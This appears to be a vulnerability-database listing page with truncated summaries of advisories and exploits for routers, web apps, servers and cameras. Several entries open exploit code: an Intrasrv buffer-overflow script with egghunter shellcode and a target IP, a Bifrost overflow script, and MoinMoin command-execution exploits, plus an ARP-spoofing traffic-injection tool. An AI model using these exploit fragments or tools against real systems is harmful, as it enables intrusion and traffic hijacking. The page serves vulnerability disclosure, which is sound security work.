ET - Chat Password Reset Security Bypass

ET - Chat Password Reset Security Bypass source: https://www.securityfocus.com/bid/66149/info ET - Chat is prone to a security bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further...

Cisco released Security advisory for critical Router password reset vulnerability

In the first week of this year, we have reported about a critical vulnerability found in more than 2000 Routers that allow attackers to reset the admin panel password to defaults. Recently, Cisco has released a security advisory, detailed about the similar vulnerability affecting their three...

XSS when attaching a file to an issue

Hi, I found a persistent XSS vulnerability when attaching a file to an issue. The steps to reproduce are the following : - Attach a file to an issue. Its name must contain "alert'XSS'". I used a python script to do that. - Browse to the issue and open the ALL tab under activity. A popup should...

TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service

Exploit title: 150M Wireless Lite N Router HTTP DoS Date: 28.11.2013 Exploit Author: Dino Causevic Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N Vendor Homepage: http://www.tp-link.com/ Contact: dincaus packetstormsecurity.com CVE: Firmware Version: 3.12.11 Build 1203...

[LANs.py] Capture and inject traffic on LAN

Multithreaded asynchronous packet parsing/injecting arp spoofer. Individually arpspoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans ...

[Firefox] убираем кодирование кавычек в URL | Firefox URL quote encoding patch

See next post for English description! Патч призван устранить кодирование кавычек ',", в HTTP запросах. Начиная с версии 3.0 коммит, Firefox стал урл-кодировать одинарную кавычку ' в %27. Данное поведение нередко может помешать обнаружить SQL инъекцию в веб-приложениях, например, при участии...

SEC Consult SA-20131003-0 :: Denial of service vulnerability in Citrix NetScaler

SEC Consult Vulnerability Lab Security Advisory 20131003-0 ======================================================================= title: nsconfigd NSRPCREMOTECMD Denial of service vulnerability product: Citrix NetScaler vulnerable version: NetScaler 10.0 Build 76.7 fixed version: NetScaler 10.0...

Fedora 18 : livecd-tools-18.17-1.fc18 (2013-13131)

Added a couple features to livecd-iso-to-disk --updates and --ks and fixed a traceback when there are dependency problems running livecd-creator. Require rsync The livecd-tools package provides support for reading and executing Kickstart files in order to create a system image. It was discovered...

AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities

Multiple vulnerabilities have been found in AVTECH AVN801 DVR and potentially other devices sharing the affected firmware that could allow a remote attacker to exploit multiple buffer overflows resulting in arbitrary code execution or bypass CAPTCHA functionality for logging into the administrati...

Fedora 19 : livecd-tools-19.4-1.fc19 (2013-9827)

Some fixed for running from F19 host. The livecd-tools package provides support for reading and executing Kickstart files in order to create a system image. It was discovered that livecd-tools gave the root user an empty password rather than leaving the password locked in situations where no...

Bifrost 1.2.1 - Remote Buffer Overflow

Bifrost 1.2.1 - Remote Buffer Overflow !/usr/bin/python2.7 By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import sys def rc4cryptdata, key: x = 0 box = range256 for i in range256: x = x + boxi + ordkeyi % lenkey % 256 boxi, boxx = boxx, boxi...

TP-Link Print Server TL PS110U - Sensitive Information Enumeration

Exploit for hardware platform in category remote exploits TP-Link TL PS110U Print Server runs telnet service which enables an attacker to access the configuration details without authentication. The PoC can extract device name, MAC address, manufacture name, Printer model, and SNMP Community...

Xpient Cash Drawer Operation Vulnerability

Advisory ID Internal CORE-2013-0517 1. Advisory Information Title: Xpient Cash Drawer Operation Vulnerability Advisory ID: CORE-2013-0517 Advisory URL:http://www.coresecurity.com/advisories/xpient-cash-drawer-operation-vulnerability Date published: 2013-06-05 Date of last update: 2013-06-05...

ModSecurity Remote Null Pointer Dereference Vulnerability

When ModSecurity receives a request body with a size bigger than the value set by the "SecRequestBodyInMemoryLimit" and with a "Content-Type" that has no request body processor mapped to it, ModSecurity will systematically crash on every call to "forceRequestBodyVariable" in phase 1. This is the...

Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

MoinMelt Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

Vivotek IP Camera Buffer Overflow / Injection Vulnerabilities

Core Security Technologies Advisory - Vivotek IP Cameras suffer from information leak, buffer overflow, authentication, path traversal, and command injection vulnerabilities. Vulnerable are Vivotek PT7135 IP camera with firmware 0300a, Vivotek PT7135 IP camera with firmware 0400a, and possibly...

BigAnt Server 2.97 - DDNF 'Username' Remote Buffer Overflow

!/usr/bin/python Title: BigAnt Server 2.97 DDNF Username Buffer Overflow Author: Craig Freyman @cd1zz http://pwnag3.com Tested on: Windows 7 64 bit DEP/ASLR Bypass Similar Exploits: http://www.exploit-db.com/exploits/24528/ http://www.exploit-db.com/exploits/24527/...